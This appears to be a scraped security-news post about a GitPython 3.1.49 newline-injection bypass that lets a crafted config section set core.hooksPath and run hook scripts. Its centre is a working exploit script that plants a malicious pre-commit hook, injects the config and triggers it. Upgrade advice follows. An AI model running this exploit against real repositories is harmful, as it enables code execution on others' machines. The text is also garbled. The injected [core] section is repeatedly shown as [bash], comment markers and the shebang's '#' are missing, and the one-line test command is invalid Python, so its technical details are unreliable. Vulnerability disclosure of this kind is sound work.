Listen to this Post
The vulnerability exists because the `set_value()` method of `GitConfigParser` in `git/config.py` (GitPython 3.1.49) only validates newlines in the `value` parameter. The `section` and `option` parameters are passed directly to `configparser` without any validation. An attacker who controls the `section` argument can inject newline characters (\n) to manipulate the structure of the `.git/config` file. Specifically, when `_write()` formats a section header as "[%s]\n" % name, providing a `section` value like `”user]\n[core”` results in two separate section headers: `
` and <code>[bash]</code>. This allows an attacker to inject arbitrary configuration sections, including a malicious `[bash]` section with a `hooksPath` pointing to an attacker‑controlled directory. Consequently, when any Git hook (e.g., <code>pre-commit</code>) is triggered, the attacker’s hook script executes, leading to remote code execution (RCE). This is a bypass of the original patch for CVE‑2026‑42215, which only addressed newline injection in the `value` parameter.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: GitPython
Version: 3.1.49
Vulnerability: Newline injection
Severity: High
Date: 2026-05-06
<h2 style="color: blue;">Prediction: Upgrade to 3.1.50</h2>
<h2 style="color: blue;">Analytics (What Undercode Say)</h2>
[bash]
Check current GitPython version
pip show GitPython | grep Version
Verify if vulnerable to newline injection (section parameter)
python -c "import git; repo = git.Repo.init('/tmp/test_repo'); with repo.config_writer() as cw: cw.set_value('test]\n[core', 'hooksPath', '/tmp/evil'); print('Vulnerable if config entry is written')"
Apply the fix by upgrading to 3.1.50 or later
pip install --upgrade GitPython==3.1.50
Exploit
import git, os, subprocess
Initialize a repository
repo = git.Repo.init("/tmp/bypass_test")
os.makedirs("/tmp/evil_hooks", exist_ok=True)
Create a malicious pre-commit hook
with open("/tmp/evil_hooks/pre-commit", "w") as f:
f.write("!/bin/sh\nid > /tmp/rce_proof.txt\n")
os.chmod("/tmp/evil_hooks/pre-commit", 0o755)
Inject newline in the section parameter
with repo.config_writer() as cw:
cw.set_value("user]\n[core", "hooksPath", "/tmp/evil_hooks")
Verify the injection
r = subprocess.run(["git", "-C", "/tmp/bypass_test", "config", "core.hooksPath"],
capture_output=True, text=True)
print(r.stdout.strip()) Output: /tmp/evil_hooks
Trigger the hook
subprocess.run(["git", "-C", "/tmp/bypass_test", "commit", "--allow-empty", "-m", "x"])
print(open("/tmp/rce_proof.txt").read()) RCE confirmed
Protection
Upgrade GitPython to version 3.1.50 or later.
If upgrading is not immediately possible, avoid passing untrusted input to the `section` or `option` parameters of set_value().
Consider using a network‑level or filesystem monitoring solution to detect unexpected modifications to `.git/config` files.
Impact
Successful exploitation allows an attacker to execute arbitrary commands on the victim’s machine with the privileges of the GitPython process. This can lead to data theft, system compromise, or use as a pivot point for further attacks within an internal network.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
